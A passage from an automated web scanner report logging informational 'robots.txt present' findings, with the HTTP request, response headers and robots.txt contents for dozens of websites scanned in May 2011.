Last-modified: Wed, 19 May 2004 18:51:35 GMT
Content-length: 60
Etag: "3c-40abacb7"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /csc/facdir/
Disallow: /csc/studir/

27.1505. http://www.southcoastreport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southcoastreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.southcoastreport.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://southcoastreport.com/xmlrpc.php
Set-Cookie: PHPSESSID=9b826ebf681c035a568955b31b6b6de0; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1506. http://www.spaguts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spaguts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spaguts.com

Response

HTTP/1.1 200 OK
Content-Length: 167
Content-Type: text/plain
Last-Modified: Sat, 19 Jun 2010 20:44:41 GMT
Accept-Ranges: bytes
ETag: "a4daee3df0fcb1:41b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:26:55 GMT
Connection: close

User-agent: *
Disallow: /bin/
Disallow: /css/
Disallow: /Data/
Disallow: /Documents/
Disallow: /error/
Disallow: /p7tm/
Disallow: /ssl/
Disallow: /Utilities/

27.1507. http://www.sportrider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportrider.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportrider.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:20:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=z55wq155143itm45jbmc4355; path=/; HttpOnly
Set-Cookie: UserPuid=2339329318029140986; domain=sportrider.com; expires=Wed, 04-May-2061 02:20:16 GMT; path=/
Cache-Control: private
Content-Type: text/plain
Content-Length: 293

User-agent: *
Disallow: /bin/
Disallow: /aspnet_client/
Disallow: /redir/
Disallow: /controls/
Disallow: /srv/
Disallow: /*?
Disallow: /popup/
Disallow: /dropdownxml/
Disallow: /*.aspx$
Disa
...[SNIP]...

27.1508. http://www.sportsmansparadiseonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsmansparadiseonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsmansparadiseonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:07 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 00:41:10 GMT
ETag: "3bcc41b-18-49a14282aec6a"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.1509. http://www.springtrainingonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springtrainingonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.springtrainingonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:39 GMT
Server: Apache
Last-Modified: Mon, 23 Nov 2009 19:55:35 GMT
ETag: "94b267d-130-4790f35725bc0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1510. http://www.spywarefixpro.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spywarefixpro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spywarefixpro.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:11 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.spywarefixpro.com/xmlrpc.php
Set-Cookie: PHPSESSID=c8829a4033d1b9d3adc3f154faccb12d; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.spywarefixpro.com/sitemap.xml.gz

27.1511. http://www.ssssssssss.in/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ssssssssss.in
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ssssssssss.in

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:51:00 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "32df16e-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.1512. http://www.st.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.st.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.st.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:29 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.4 mod_perl/1.26
Cache-Control: max-age=60
Expires: Wed, 04 May 2011 03:18:29 GMT
Last-Modified: Fri, 12 Nov 2010 16:28:41 GMT
ETag: "13a043-78f-4cdd6b39"
Accept-Ranges: bytes
Content-Type: text/plain
Content-length: 1935
Connection: close
Set-Cookie: BC_HA_32514F86D9DCF77D=10571F5_0; Domain=.st.com; expires=Wed, 04-May-11 03:35:40 GMT; Path=/

User-agent: * # directed to all spiders, not just Scooter
Crawl-delay: 10
Request-rate: 1/10
Disallow: /stonline/products/newsletters/st-calling/
Disallow: /icons/
Disallow: /address/sameric
...[SNIP]...

27.1513. http://www.startovertoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.startovertoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.startovertoday.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:11:47 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Mon, 29 Mar 2010 19:51:30 GMT
ETag: "14924-b4-482f5d6d93480"
Accept-Ranges: bytes
Content-Length: 180
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /cgi-bin/

Disallow: /images/

Disallow: /thank-you.php

Disallow: /thank-you-credit.php

Disallow: /thank-you-taxres.php

Disallow: /thank-you-taxprep.php

27.1514. http://www.state.de.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.de.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.de.us

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:11 GMT
Server: Apache/2.2.3 (Oracle)
Last-Modified: Fri, 16 Jul 2010 13:25:29 GMT
ETag: "65440c-1a-270c4440"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1515. http://www.state.nd.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nd.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.nd.us

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:40 GMT
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 20 Jan 2011 13:21:03 GMT
ETag: "24c31ee3a4b8cb1:c13"
Content-Length: 335
Connection: close

User-agent: *
Disallow: /postcard.htm
Disallow: */exit-page.aspx
Disallow: /sec/
Disallow: /taxdpt/
Disallow: /tax/vendor/
Disallow: /gnf/
Disallow: /pnr/
Disallow: /trcenter/
Disallow: /doh/
...[SNIP]...

27.1516. http://www.statejournal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.statejournal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.statejournal.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 19 Nov 2010 15:00:14 GMT
Accept-Ranges: bytes
ETag: "96f36678fa87cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:43:14 GMT
Connection: close
Content-Length: 396

User-agent: *
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

User-agent: Googlebot
Disallow: /mobile/
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

Us
...[SNIP]...

27.1517. http://www.stateline.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stateline.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stateline.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:00:06 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 18:22:47 GMT
ETag: "24884d8-eb-48874c276ebc0"
Accept-Ranges: bytes
Content-Length: 235
Connection: close
Content-Type: text/plain; charset=UTF-8

# For domain: http://www.stateline.org

# All robots will spider the domain
User-agent: *
Disallow: /working

# Disallow directory /live/actions
User-agent: *
Disallow: /live/actions

Sitemap: http://
...[SNIP]...

27.1518. http://www.stats4free.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stats4free.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stats4free.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:47 GMT
Server: Apache/2.2.9 (Debian)
Content-Length: 532
Connection: close
Content-Type: text/html; charset=ISO-8859-1

User-agent: *
Disallow: /webmaster/
Disallow: /mobil/
Disallow: /a/
Disallow: /button.php
Disallow: /counter.php
Disallow: /count.php
Disallow: /stat.php
Disallow: /overlay.php
Disallow: /js/

...[SNIP]...

27.1519. http://www.steampunkworkshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.steampunkworkshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.steampunkworkshop.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:51 GMT
Server: Apache
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
ETag: "a1e46b7-624-48f94dd34cf00"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:36:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1520. http://www.stereophile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stereophile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stereophile.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:57 GMT
Server: Apache/1.3.34 (Unix) PHP/5.2.6 mod_perl/1.29
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:42:57 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1521. http://www.straight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.straight.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.straight.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 07 Oct 2009 18:03:31 GMT
ETag: "380746-38b-4755c2a1fa2c0"
Accept-Ranges: bytes
Content-Length: 907
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
# more information about this file can be found at
# more info -> http://www.robotstxt.org/wc/robots.html
# syntax checking -> http://www.sxw.org.uk/computing/robots/check.html
# lines be
...[SNIP]...

27.1522. http://www.strasburgrailroad.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.strasburgrailroad.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.strasburgrailroad.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:20 GMT
Server: Apache/2.0.54
Last-Modified: Sun, 11 Mar 2007 18:40:19 GMT
ETag: "60991e8-73-fd0f2ac0"
Accept-Ranges: bytes
Content-Length: 115
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /callcenter
Disallow: /ajax
Disallow: /js
Disallow: /css
Disallow: /404.php
Disallow: /test

27.1523. http://www.strausnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.strausnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.strausnews.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Wed, 04 May 2011 01:45:17 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4999
Accept-Ranges: bytes
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: strausnews.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

27.1524. http://www.streetprices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.streetprices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.streetprices.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:48 GMT
Server: Apache
Set-Cookie: sss=1304479308-591-7268-173.193.214.243; domain=streetprices.com; path=/; expires=Tue, 29-Apr-2031 03:21:48 GMT
Set-Cookie: session=1304479308-591-7268-173.193.214.243; domain=streetprices.com; path=/; expires=Wed, 04-May-2011 15:21:48 GMT
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 04:21:48 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /rd.pl
Disallow: /img/
Disallow: /changezip.pl
Disallow: /Info/RequestPriceAlert.pl
Disallow: /q/
Disallow: /x/wrapper.cgi
Disallow: /redir_craigslist.pl
Disallow: /x/p
...[SNIP]...

27.1525. http://www.streetrodderweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.streetrodderweb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.streetrodderweb.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:21:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c4n5qgienqkgwd45zdrmqc45; path=/; HttpOnly
Set-Cookie: UserPuid=2336565397355860362; domain=streetrodderweb.com; expires=Wed, 04-May-2061 01:21:46 GMT; path=/
Cache-Control: private
Content-Type: text/plain
Content-Length: 293

User-agent: *
Disallow: /bin/
Disallow: /aspnet_client/
Disallow: /redir/
Disallow: /controls/
Disallow: /srv/
Disallow: /*?
Disallow: /popup/
Disallow: /dropdownxml/
Disallow: /*.aspx$
Disa
...[SNIP]...

27.1526. http://www.stumpsparty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumpsparty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumpsparty.com

Response

HTTP/1.0 200 OK
Content-Length: 186
Content-Type: text/plain
Content-Location: http://www.stumpsparty.com/robots.txt
Last-Modified: Wed, 03 Feb 2010 19:37:03 GMT
Accept-Ranges: bytes
ETag: "d6fd18438a5ca1:bf15"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:08:28 GMT
Connection: close

User-agent: *
Disallow: /cart.cfm
Disallow: /checkout.cfm
Disallow: /order_status.cfm
Disallow: /buy.cfm
Disallow: /quickorder.cfm
sitemap: http://www.stumpsparty.com/sitemap.xml

27.1527. http://www.subastandolo.com.mx/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.subastandolo.com.mx
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.subastandolo.com.mx

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:37 GMT
Server: PHP-CGI/0.9 Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Tue, 08 Mar 2011 21:24:17 GMT
ETag: "183473e-18-49dff3c13e240"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.1528. http://www.suggestexplorer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suggestexplorer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suggestexplorer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 01 Dec 2008 01:50:16 GMT
ETag: "1ba813d-47-45cf26eb46600"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow:

User-agent: *
Disallow: /adspy
Disallow: /ref

27.1529. http://www.summerdrive2010.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.summerdrive2010.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.summerdrive2010.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:14 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: COOKIE=10.5.16.244.1304482394575525; path=/
Set-Cookie: referrer=; path=/
Set-Cookie: t=d4f30d00760411e0b0290015c5e75168; path=/
Set-Cookie: referrer=www.summerdrive2010.com; path=/
Vary: Accept-Encoding,User-Agent
Cartoon: aalander6
Content-Length: 78
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

Sitemap: http://www.summerdrive2010.com/Sitemap.xml


27.1530. http://www.sunstar.com.ph/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sunstar.com.ph
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sunstar.com.ph

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Sun, 06 Mar 2011 11:48:47 GMT
Accept-Ranges: bytes
Content-Length: 2565
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:13:59 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1531. http://www.superatv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superatv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superatv.com

Response

HTTP/1.1 200 OK
Content-Length: 282
Content-Type: text/plain
Last-Modified: Fri, 10 Dec 2010 20:16:50 GMT
Accept-Ranges: bytes
ETag: "ca49782da798cb1:b9f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:18:31 GMT
Connection: close

User-Agent: *
Disallow: /Admin/
Disallow: /App_Themes/
Disallow: /Checkout/
Disallow: /ClientApi/
Disallow: /ConLib/
Disallow: /FCKeditor/
Disallow: /Install/
Disallow: /Layouts/
Disallow: /M
...[SNIP]...

27.1532. http://www.superglossary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superglossary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superglossary.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:42 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 18:46:39 GMT
ETag: "10af282-77-49e619d962ebf"
Accept-Ranges: bytes
Content-Length: 119
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /Database/

Disallow: /documents/

Allow: /

Sitemap: http://www.superglossary.com/sitemap.xml

27.1533. http://www.superherorelease.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superherorelease.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superherorelease.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Feb 2011 17:51:42 GMT
Accept-Ranges: bytes
ETag: "0cb7d7e4bd4cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:37:32 GMT
Connection: close
Content-Length: 147

# Dont allow search engines to index specific folder
User-agent: *
Sitemap: /sitemap.aspx
Disallow: /stats
Disallow: /members
Disallow: /admin

27.1534. http://www.supersupportspot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supersupportspot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.supersupportspot.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:36:46 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 13:34:16 GMT
ETag: "9a969d3-4d-48b814675a600"
Accept-Ranges: bytes
Content-Length: 77
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /disclosure-policy.php
Disallow: /privacy-policy.php

27.1535. http://www.supertopo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supertopo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.supertopo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:30 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8 mod_ssl/2.2.11 OpenSSL/0.9.8e
Last-Modified: Tue, 06 Apr 2010 16:25:57 GMT
ETag: "23f0a9-218-48393e6798f40"
Accept-Ranges: bytes
Content-Length: 536
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forumsearch.php
Disallow: /forumsearchadv.php
Disallow: /forumpostsearch.html
Disallow: /forumpostsearch.php
Disallow: /photosearch.php
Disallow: /stsearch.php
Disallow: /vote
...[SNIP]...

27.1536. http://www.surewest.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surewest.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surewest.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:38 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 16:11:19 GMT
ETag: "28b-4853a24cf37c0"
Accept-Ranges: bytes
Content-Length: 651
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /google/
Disallow: /search/
Disallow: /provisioning/
Disallow: /library/
Disallow: /files/
Disallow: login.php
Disallow: login_proxy.php
Disallow: /tv/login.php
Disallow: /ajax
...[SNIP]...

27.1537. http://www.surfers.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surfers.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surfers.ro

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:43 GMT
Server: Apache
Last-Modified: Mon, 08 Feb 2010 12:54:15 GMT
ETag: "10df7d-3ad-47f164c6c0bc0"
Accept-Ranges: bytes
Content-Length: 941
Connection: close
Content-Type: text/plain

User-Agent: wget
Disallow: /
User-Agent: sitecheck.internetseer.com
Disallow: /
User-Agent: grub-client
Disallow: /
User-Agent: NPBot
Disallow: /
User-Agent: WebReaper
Disallow: /
User-Agent
...[SNIP]...

27.1538. http://www.surfmusic.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surfmusic.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surfmusic.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 19 Sep 2004 14:13:29 GMT
ETag: "a00a047-17-165440"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1539. http://www.surnamesite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surnamesite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surnamesite.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:30 GMT
Server: Apache/1.3.20 (Unix) PHP/4.0.6
Last-Modified: Tue, 21 Dec 2004 19:12:20 GMT
ETag: "18a67-22-41c87594"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /images

27.1540. http://www.surveyentrance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surveyentrance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surveyentrance.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:07 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n
Last-Modified: Tue, 23 Nov 2010 14:22:58 GMT
ETag: "102f06-1a-495b91bfe9480"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1541. http://www.surveymoneymachine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surveymoneymachine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surveymoneymachine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:49 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 00:38:59 GMT
ETag: "7c209fa-1d27-4947fd994aec0"
Accept-Ranges: bytes
Content-Length: 7463
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: Teoma
Disallow: /

User-agent: Googlebot
Disallow: /*swf*

User-agent:*
Disallow: /cgi-bin/
Disallow: /account/
Disallow: /affiliate/
Disallow
...[SNIP]...

27.1542. http://www.suzukipartshouse.net/favicon.ico  previous  next

Summary

Severity:   Information
